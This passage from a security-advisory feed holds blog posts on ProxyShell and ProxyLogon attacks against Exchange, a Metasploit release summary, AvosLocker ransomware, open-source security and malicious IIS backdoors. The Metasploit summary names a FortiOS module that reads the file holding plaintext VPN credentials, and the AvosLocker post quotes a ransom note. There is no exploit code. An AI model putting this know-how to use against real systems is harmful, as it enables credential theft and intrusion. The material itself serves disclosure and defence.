Exploitation is ongoing.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-12T21:08:43", "type": "rapid7blog", "title": "ProxyShell: More Widespread Exploitation of Microsoft Exchange Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-36942"], "modified": "2021-08-12T21:08:43", "id": "RAPID7BLOG:03B1EB65D8A7CFE486943E2472225BA1", "href": "https://blog.rapid7.com/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-05T23:34:05", "description": "## FortiOS Path Traversal\n\n\n\nReturning community contributor [mekhalleh](<https://github.com/mekhalleh>) submitted a module targeting a path traversal vulnerability within the SSL VPN web portal in multiple versions of FortiOS. 
The flaw is leveraged to read the usernames and passwords of currently logged in users which are stored in plaintext on the file system. This vulnerability is identified as [CVE-2018-13379](<https://attackerkb.com/topics/VEc81wfDS7/cve-2018-13379-path-traversal-in-fortinet-fortios?referrer=blog>) and can be reliably exploited remotely, without any authentication. Despite the fact that the vulnerability is several years old, CVE-2018-13379 is still known to be [exploited in the wild](<https://attackerkb.com/topics/VEc81wfDS7/cve-2018-13379-path-traversal-in-fortinet-fortios?referrer=blog>), including in [state-sponsored attacks](<https://us-cert.cisa.gov/ncas/alerts/aa20-283a>) targeting U.S. government agencies and infrastructure.\n\n## Additional Module Updates\n\nTwo modules received improvements to their targeting capabilities. The ever-popular exploit for [MS17-010](<https://attackerkb.com/topics/xI1y9OoEgq/cve-2017-0144-ms17-010?referrer=blog>) was updated by [zerosum0x0](<https://github.com/zerosum0x0>) (one of the original authors) with an updated fingerprint for properly targeting Windows Storage Server 2008. This allows the exploit module to be used against affected versions of that Server 2008 variant. Additionally, a KarjaSoft Sami FTP exploit was updated by long-time community contributor [bcoles](<https://github.com/bcoles>) who made a number of improvements to it but notably updated the exploit to only rely on an offset within a DLL that is distributed with the vulnerable software. 
When memory corruption exploits need the address of a POP, POP, RET instruction sequence (as this one does for the SEH overwrite), they are more reliable when referencing one that is distributed with the software and won\u2019t change, unlike libraries that come with the host operating system and are regularly updated.\n\n## New Modules (1)\n\n * [FortiOS Path Traversal Credential Gatherer](<https://github.com/rapid7/metasploit-framework/pull/14518>) by lynx (Carlos Vieira) and mekhalleh (RAMELLA S\u00e9bastien), which exploits a directory traversal vulnerability (CVE-2018-13379) in the SSL VPN web portal of FortiOS 5.4.6 to 5.4.12, FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 to grab the `/dev/cmdb/sslvpn_websession` file, containing the plaintext list of currently connected usernames and their associated passwords. These credentials can then be saved to the `creds` database for use in future attacks.\n\n## Enhancements and features\n\n * [#14783](<https://github.com/rapid7/metasploit-framework/pull/14783>) from [bcoles](<https://github.com/bcoles>) The KarjaSoft Sami FTP Server v2.0.2 USER Overflow module has been updated with documentation, RuboCop updates, support for the AutoCheck mixin to automatically check if a target is vulnerable, an updated list of authors, as well as improvements to its exploit strategy that allow it to use only one offset within a DLL shipped with the target for exploitation, instead of relying on a Windows OS DLL whose offsets could change as the OS was updated.\n * [#14838](<https://github.com/rapid7/metasploit-framework/pull/14838>) from [zerosum0x0](<https://github.com/zerosum0x0>) The `psexec_ms17_010.rb` library has been updated to support additionally fingerprinting Windows Storage Server 2008 R2 targets as potentially exploitable targets, thereby allowing users to exploit Windows Storage Server 2008 R2 targets vulnerable to MS17-010.\n\n## Bugs Fixed\n\n * [#14816](<https://github.com/rapid7/metasploit-framework/pull/14816>) from 
[dwelch-r7](<https://github.com/dwelch-r7>) Ensures that the `Faker` library is always available for use within modules when generating fake data for bypassing WAF etc.\n * [#14821](<https://github.com/rapid7/metasploit-framework/pull/14821>) from [space-r7](<https://github.com/space-r7>) The `search` command within Meterpreter has had its logic updated to support searches that start at the root directory, aka `/`. These types of searches were previously not returning any results due to a logic bug within the code, which has now been fixed.\n * [#14840](<https://github.com/rapid7/metasploit-framework/pull/14840>) from [dwelch-r7](<https://github.com/dwelch-r7>) Removes `require rex/ui` statement that prevented execution of `msfrpc`.\n * [#14843](<https://github.com/rapid7/metasploit-framework/pull/14843>) from [dwelch-r7](<https://github.com/dwelch-r7>) With the upgrade to zeitwerk in Metasploit, PseudoShell was not being picked up appropriately, resulting in some modules and tools not being able to load it when needed. 
A fix has now been applied to make sure that PseudoShell can be appropriately loaded by zeitwerk to prevent missing dependency issues.\n * [#14853](<https://github.com/rapid7/metasploit-framework/pull/14853>) from [adfoster-r7](<https://github.com/adfoster-r7>) Fixes an edge case when upgrading from an older version of Metasploit to Metasploit 6.0.32 when using the Mac Metasploit Omnibus installer directly or indirectly via Brew\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.32...6.0.33](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-02-25T11%3A27%3A42-06%3A00..2021-03-04T11%3A16%3A38-06%3A00%22>)\n * [Full diff 6.0.32...6.0.33](<https://github.com/rapid7/metasploit-framework/compare/6.0.32...6.0.33>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-03-05T17:20:43", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0144", "CVE-2018-13379"], "modified": "2021-03-05T17:20:43", "id": "RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A", "href": "https://blog.rapid7.com/2021/03/05/metasploit-wrap-up-101/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-19T19:46:39", "description": "\n\nThe past few weeks have shown us the importance and wide reach of open-source security. 
In December 2021, public disclosure of the [Log4Shell vulnerability in Log4j](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>), an open-source logging library, caused a cascade of dependency analysis by developers in organizations around the world. The incident was so wide-reaching that representatives from federal agencies and large private-sector companies gathered on January 13, 2022, at a [White House meeting](<https://www.whitehouse.gov/briefing-room/statements-releases/2022/01/13/readout-of-white-house-meeting-on-software-security/>) to discuss initiatives for securing open-source software.\n\nA large percentage of the software we rely on today is proprietary or closed-source, meaning that the software is fully controlled by the company and closed for independent review. But in most cases, all of the code written to build the proprietary software is not entirely produced by the companies that provide the products and services; instead, they use a third-party library or a component piece of software to help them assemble their solution.\n\nMany of those third-party components are classified as open-source software, meaning the source code is freely available for anyone to use, view, change to correct issues, or enhance to add new functionality. Open-source software projects are frequently maintained by volunteers, and a community of developers and users forms around a shared passion for the software. It\u2019s their passion and collaboration that help projects grow and remain supported. 
\n\n## Finding the resources for open-source security\n\nYet for the majority of open-source projects that do not have a large corporate backer, the role these individuals play is frequently overlooked by software consumers, and as a result, many open-source projects face maintenance challenges.\n\nLimited resources impose a variety of constraints on projects, but the implications are particularly wide-reaching when we look at the challenge of securing open-source software. Vulnerabilities discovered in proprietary software are the responsibility of the software vendor, frequently better funded than open-source software, with teams available to triage and resolve defects. Better **\u2014** or any **\u2014** funding, or broader community participation, may also increase the chance of avoiding vulnerabilities during development or discovering them during quality assurance checks. It can also help developers more quickly identify and resolve vulnerabilities discovered at a future date.\n\nIncreasing open-source project funding is a wonderful idea, and it\u2019s in the best interest of companies using such software to build their products and services. However, funding alone won\u2019t increase security in open-source projects, just as the greater source code visibility in open-source hasn\u2019t necessarily resulted in fewer defects or shortened times between defect introduction and resolution. \n\nFor example, the vulnerability in Microsoft\u2019s Server Message Block (SMB) protocol implementation ([CVE-2017-0144](<https://attackerkb.com/topics/xI1y9OoEgq/cve-2017-0144-ms17-010?referrer=blog>)) was around for many years before the defect was resolved in 2017. Similarly, the Log4Shell ([CVE-2021-44228](<https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis?referrer=blog>)) vulnerability in the Log4j project was introduced in 2013, and it remained undiscovered and unresolved until December 2021. 
There is clearly a massive difference in both funding and available resources to those involved in these projects, and yet both were able to have vulnerable defects exist for years before resolution.\n\n## Solving the problem at the source (code)\n\nAccidental software vulnerabilities share similar root causes whether they\u2019re found in proprietary or open-source software. When developers create new features or modify existing ones, we need code reviews that look beyond feature functionality confirmation. We need to inspect the code changes for security issues but also perform a deeper analysis, with attention to the security implications of these changes within the greater scope of the complete project.\n\nThe challenge is that not all developers are security practitioners, and that is not a realistic expectation. The limited resources of open-source projects compound the problem, increasing the likelihood that contribution reviews focus primarily on functionality. We should encourage developer training in secure coding practices but understand that mistakes are still possible. That means we need processes and tooling to assist with secure coding.\n\nSecurity in open-source software carries some other unique challenges due to the open environment. Projects tend to accept a wide variety of contributions from anyone. A new feature might not have enough of a demand to get time from the primary developers, but anyone who takes the time to develop the feature while staying within the bounds of the project\u2019s goals and best practices may very well have their contribution accepted and merged into the project. Projects may find themselves the target of malicious contributions through covert defect introduction. 
The project may even be sabotaged by a project maintainer, or the original maintainer may want to retire from the project and end up handing it over to another party that \u2014 intentionally or not \u2014 introduces a defect.\n\nIt\u2019s important for us to identify open-source projects that are critical to the [software supply chain](<https://www.rapid7.com/blog/post/2021/10/22/2022-planning-designing-effective-strategies-to-manage-supply-chain-risk/>) and ensure these projects are sustainably maintained for the future. These goals would benefit from increased adoption of secure coding practices and infrastructure that ensures secure distribution and verification of software build artifacts.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-19T18:02:43", "type": "rapid7blog", "title": "Open-Source Security: Getting to the Root of the Problem", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2021-44228"], "modified": "2022-01-19T18:02:43", "id": 
"RAPID7BLOG:2FFDE45F01FA44216BE91DD7AFA0D060", "href": "https://blog.rapid7.com/2022/01/19/open-source-security-getting-to-the-root-of-the-problem/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2022-03-21T21:27:45", "description": "The FBI has issued an[ advisory](<https://www.ic3.gov/Media/News/2022/220318.pdf>) about the AvosLocker ransomware. Notably the FBI has noticed that several victims have reported Microsoft Exchange Server vulnerabilities as the intrusion vector. \n\nAvosLocker is a Ransomware as a Service (RaaS) affiliate-based group that has targeted victims across multiple critical infrastructure sectors in the United States including financial services, critical manufacturing, and government facilities.\n\n## Threat profile\n\nAvosLocker ransomware is a multi-threaded Windows executable written in C++ that runs as a console application and shows a log of actions performed on victim systems. AvosLocker ransomware encrypts files on a victim\u2019s server and renames them with the \u201c.avos\u201d extension.\n\nThe AvosLocker executable leaves a ransom note called GET_YOUR_FILES_BACK.txt in all directories where encryption occurs. 
The ransom note includes a .onion site that contains instructions for paying the ransom and receiving a decryption key.\n\n\n\n> _Attention!_\n> \n> _Your systems have been encrypted, and your confidential documents were downloaded._\n> \n> _In order to restore your data, you must pay for the decryption key & application._\n> \n> _You may do so by visiting us at <onion address>._\n> \n> _This is an onion address that you may access using Tor Browser which you may download at <https://www.torproject.org/download/>_\n> \n> _Details such as pricing, how long before the price increases and such will be available to you once you enter your ID presented to you below in this note in our website._\n> \n> _Contact us soon, because those who don\u2019t have their data leaked in our press release blog and the price they\u2019ll have to pay will go up significantly._\n> \n> _The corporations whom don\u2019t pay or fail to respond in a swift manner have their data leaked in our blog, accessible at <onion address>_\n\nSo, besides encrypting your files, AvosLocker also exfiltrates data and threatens to publish the stolen data to its leaks site. The public leak site not only lists victims of AvosLocker, along with a sample of data allegedly stolen from the victim\u2019s network, but also gives visitors an opportunity to view a sample of victim data and to purchase that data.\n\nThe FBI also notes that in some cases, AvosLocker victims receive phone calls from an AvosLocker representative. The caller encourages the victim to go to the .onion site to negotiate, and threatens to post stolen data online. 
In some cases, AvosLocker actors will threaten and execute distributed denial-of-service (DDoS) attacks during negotiations.\n\n## Exchange vulnerabilities\n\nSince AvosLocker is a Ransomware-as-a-Service operation, which of these vulnerabilities gets used may depend on the affiliate.\n\nThe Exchange Server vulnerabilities named are CVE-2021-31207, CVE-2021-34523, CVE-2021-34473, and CVE-2021-26855.\n\n[CVE-2021-31207](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31207>): a Microsoft Exchange Server security feature bypass vulnerability. The vulnerability allows a remote user to bypass the authentication process. This is the way in.\n\n[CVE-2021-34523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34523>): a Microsoft Exchange Server elevation of privilege (EoP) vulnerability. The vulnerability allows a user to raise their permissions. This is how they take control.\n\n[CVE-2021-34473](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473>): a Microsoft Exchange Server remote code execution (RCE) vulnerability. The vulnerability allows an authenticated user to execute arbitrary code in the context of SYSTEM and write arbitrary files. This allows the attacker to drop malware on the server and run it.\n\nThis is exactly the same attack chain we [described](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>) in August 2021. This chain of attack was generally referred to as ProxyShell.\n\nAnother RCE vulnerability in Exchange Server has been seen as well:\n\n[CVE-2021-26855](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26855>): the ProxyLogon vulnerability which we discussed in detail in our article on [Microsoft Exchange attacks causing panic as criminals go shell collecting](<https://blog.malwarebytes.com/malwarebytes-news/2021/03/microsoft-exchange-attacks-cause-panic-as-criminals-go-shell-collecting/>). 
The vulnerability allows an attacker to drop a webshell on a vulnerable Exchange Server. A web shell is a script used by an attacker that allows them to escalate and maintain persistent access on an already compromised web application. (Obviously, not every web shell is malicious, but the non-malicious ones are not interesting to us in this context.)\n\n## Mitigation\n\nAs we stated earlier, all these vulnerabilities have been patched. So, if you are wondering which updates to install next and you are running one or more Microsoft Exchange Server instances, starting there might be a good idea.\n\nMicrosoft\u2019s team has published a [script on GitHub](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) that can check the status of protection against ProxyLogon vulnerabilities of Exchange servers.\n\n## Detection\n\nMalwarebytes detects AvosLocker as [Ransom.AvosLocker](<https://blog.malwarebytes.com/detections/ransom-avoslocker/>).\n\n_Malwarebytes blocks Ransom.AvosLocker_\n\nStay safe, everyone!\n\nThe post [AvosLocker ransomware uses Microsoft Exchange Server vulnerabilities, says FBI](<https://blog.malwarebytes.com/ransomware/2022/03/avoslocker-ransomware-uses-microsoft-exchange-server-vulnerabilities-says-fbi/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-21T21:09:12", "type": "malwarebytes", "title": "AvosLocker ransomware uses Microsoft Exchange Server vulnerabilities, says FBI", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-21T21:09:12", "id": "MALWAREBYTES:B830332817B5D5BEE99EF296E8EC7E2A", "href": "https://blog.malwarebytes.com/ransomware/2022/03/avoslocker-ransomware-uses-microsoft-exchange-server-vulnerabilities-says-fbi/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-23T18:35:00", "description": "Last Saturday the Cybersecurity and Infrastructure Security Agency issued an [urgent warning](<https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell>) that threat actors are actively exploiting three Microsoft Exchange vulnerabilities\u2014[CVE-2021-34473](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473>), [CVE-2021-34523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34523>), and [CVE-2021-31207](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31207>). These vulnerabilities can be chained together to remotely execute arbitrary code on a vulnerable machine.\n\nThis set of Exchange vulnerabilities is often grouped under the name ProxyShell. Fixes were available in the [May 2021 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-May>) issued by Microsoft. 
(To be more precise, the first two were patched in April and CVE-2021-31207 was patched in May.)\n\n### The attack chain\n\nSimply explained, these three vulnerabilities can be chained together to allow a remote attacker to run code on the unpatched server. Attackers use them as follows:\n\n * **Get in** with CVE-2021-31207, a Microsoft Exchange Server security feature bypass vulnerability. The vulnerability allows a remote user to bypass the authentication process.\n * **Take control** with CVE-2021-34523, a Microsoft Exchange Server elevation of privilege (EoP) vulnerability. The vulnerability allows a user to raise their permissions.\n * **Do bad things** with CVE-2021-34473, a Microsoft Exchange Server remote code execution (RCE) vulnerability. The vulnerability allows an authenticated user to execute arbitrary code in the context of SYSTEM and write arbitrary files.\n\n### ProxyShell\n\nThe Record reports that ProxyShell has been used to [take over some 2,000 Microsoft Exchange mail servers](<https://therecord.media/almost-2000-exchange-servers-hacked-using-proxyshell-exploit/>) in just two days. This can only happen where organisations use the on-premise version of Exchange, and system administrators haven't installed the April and May patches.\n\nWe know there are many reasons why patching is difficult, and often slow. The high number is surprising though, given the noise level about Microsoft Exchange vulnerabilities has been high since [March](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/>). 
It may have been muffled, though, by the other alarm cries about PrintNightmare, HiveNightmare, PetitPotam, and many others.\n\n### Ransomware\n\nSeveral researchers have pointed to a ransomware group named LockFile that combines ProxyShell with [PetitPotam](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/microsoft-provides-more-mitigation-instructions-for-the-petitpotam-attack/>). [Kevin Beaumont](<https://twitter.com/GossiTheDog>) has documented how his Exchange honeypot detected exploitation by ProxyShell to drop a [webshell](<https://blog.malwarebytes.com/malwarebytes-news/2021/03/microsoft-exchange-attacks-cause-panic-as-criminals-go-shell-collecting/>). Later, the threat actor revisited to initiate the staging of artefacts related to the LockFile ransomware. For those interested in how to identify whether their servers are vulnerable, and technical details about the stages in this attack, we highly recommend you read [Kevin Beaumont\u2019s post](<https://doublepulsar.com/multiple-threat-actors-including-a-ransomware-gang-exploiting-exchange-proxyshell-vulnerabilities-c457b1655e9c>).\n\n### PetitPotam\n\nBefore we can point out how ProxyShell can lead to a full-blown network-wide ransomware infection, we ought to tell you more about PetitPotam. PetitPotam enables a threat actor to launch an NTLM relay attack on domain controllers.\n\nPetitPotam uses the `EfsRpcOpenFileRaw` function of the Microsoft Encrypting File System Remote Protocol (MS-EFSRPC) API. MS-EFSRPC is used for maintenance and management operations on encrypted data that is stored remotely, and accessible over a network. The PetitPotam proof-of-concept (PoC) takes the form of a manipulator-in-the-middle (MitM) attack against Microsoft\u2019s NTLM authentication system. 
The targeted computer is forced to initiate an authentication procedure and share its authentication details via NTLM.\n\nSince the PetitPotam attack is not based on a vulnerability but uses a legitimate function in a way that was not intended, it will be hard to patch for this attack without \u201cbreaking stuff.\u201d Further, stopping the Encrypting File System (EFS) service does not prevent the technique from being exploited. (For mitigation details, see our post about [PetitPotam](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/microsoft-provides-more-mitigation-instructions-for-the-petitpotam-attack/>).)\n\n### LockFile\n\nLockFile attacks have been recorded mostly in the US and Asia, focusing on organizations in financial services, manufacturing, engineering, legal, business services, travel, and tourism. Symantec pointed out in a [blog post](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows>) that the ransom note from LockFile ransomware is very similar to the one used by the [LockBit](<http://blog.malwarebytes.com/detections/ransom-lockbit/>) ransomware group and that they reference the Conti gang in their email address. This may mean that members of those gangs have started a new operation, or just be another indication of how all these gangs are [connected, and sharing resources and tactics](<https://blog.malwarebytes.com/ransomware/2021/04/how-ransomware-gangs-are-connected-and-sharing-resources-and-tactics/>).\n\n### Advice\n\nCISA strongly urges organizations to identify vulnerable systems on their networks and immediately apply Microsoft's Security Update from May 2021\u2014which remediates all three ProxyShell vulnerabilities\u2014to protect against these attacks.\n\nWe would like to add that you have a look at the mitigation advice for PetitPotam and prioritize tackling these problems in your updating processes.\n\nStay safe, everyone!\n\nThe post [Patch now! 
Microsoft Exchange is being attacked via ProxyShell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-23T13:21:08", "type": "malwarebytes", "title": "Patch now! Microsoft Exchange is being attacked via ProxyShell", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-23T13:21:08", "id": "MALWAREBYTES:6A4862332586F98DA4761BE2B684752F", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-27T16:38:26", "description": "The [Microsoft 365 Defender Research Team](<https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/>) has warned that attackers are increasingly 
leveraging Internet Information Services (IIS) extensions as covert backdoors into servers.\n\nIIS extensions are able to stay hidden in target environments and as such provide a long-term persistence mechanism for attackers.\n\n## IIS\n\nIIS is webserver software created by Microsoft that runs on Windows systems. Most commonly, organizations use IIS to host ASP.NET web applications and static websites. It can also be used as an FTP server, host WCF services, and be extended to host web applications built on other platforms such as PHP.\n\nExchange Server 2016 and Exchange Server 2019 automatically configure multiple Internet Information Services (IIS) virtual directories during the server installation. As a result, administrators are not always aware of the origin of some directories and their functionality.\n\n## IIS modules\n\nThe IIS 7 and above web server feature set is componentized into more than thirty independent modules. A module is either a Win32 DLL (native module) or a .NET 2.0 type contained within an assembly (managed module). Similar to a set of building blocks, modules are added to the server in order to provide the desired functionality for applications.\n\nMalicious IIS modules are near perfect backdoors. Once installed, they will respond to specifically crafted HTTP requests sent by the operator instructing the server to collect emails, add further malicious access, or use the compromised servers for clandestine purposes. These requests will seem normal to the unsuspicious eye.\n\n## IIS backdoors\n\nIIS backdoors are harder to detect since they mostly reside in the same directories as legitimate modules, and they follow the same code structure as clean modules. 
The actual backdoor code is hard to detect as such and that also makes it hard to determine the origin.\n\n## ProxyLogon and ProxyShell\n\nSome of the methods used to drop malicious IIS extensions are known as [ProxyLogon](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/proxylogon-poc-becomes-a-game-of-whack-a-mole/>) and [ProxyShell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>). ProxyLogon consists of four vulnerabilities which can be combined to form an attack chain that only requires the attacker to find the server running Exchange, and the account from which they want to extract email. After exploiting these vulnerabilities to gain initial access, the attackers deploy web shells on the compromised servers to gain persistence and make more changes. Web shells can allow attackers to steal data and perform additional malicious actions.\n\nThe ProxyShell exploit is very similar to ProxyLogon and was discovered more recently. ProxyShell is a different attack chain designed to exploit three separate vulnerabilities: CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207.\n\n## Malicious behavior\n\nOn its blog, the Microsoft Team describes a custom IIS backdoor called FinanceSvcModel.dll which has a built-in capability to perform Exchange management operations, such as enumerating installed mailbox accounts and exporting mailboxes for exfiltration. What's interesting in this example is how the threat actor forced the system to use the WDigest protocol for authentication, resulting in lsass.exe retaining a copy of the user\u2019s plaintext password in memory. This allowed the threat actor to steal the actual passwords and not just the hashes.\n\nCredential stealing can be a goal by itself. But stolen credentials also allow the attackers to remain persistent in the environment, even if the primary backdoor is detected. 
Credential-stealing modules monitor for specific requests to detect sign-in activity and dump the provided credentials in a file the threat actor can retrieve later.\n\nGiven the rising energy prices and the falling, yet still profitable, cryptocurrency exchange rates, we wouldn\u2019t be surprised to find servers abused for cryptomining. A few years ago we saw threat actors leveraging an [IIS 6.0 vulnerability](<https://www.bleepingcomputer.com/news/security/windows-servers-targeted-for-cryptocurrency-mining-via-iis-flaw/>) to take over Windows servers and install a malware strain that mined the Electroneum cryptocurrency.\n\n## Mitigation, detection, and remediation\n\nThere are several things you can do to minimize the risk and consequences of a malicious IIS extension:\n\n * Keep your server software up to date to minimize the risk of infection.\n * Use security software that also covers your servers.\n * Regularly check loaded IIS modules on exposed IIS servers (notably Exchange servers), leveraging existing tools from the IIS server suite.\n * Deploy a backup strategy that creates regular backups that are easy to restore when needed.\n * Review permission and access policies, combined with credential hygiene.\n * Prioritize alerts that show patterns of server compromise. 
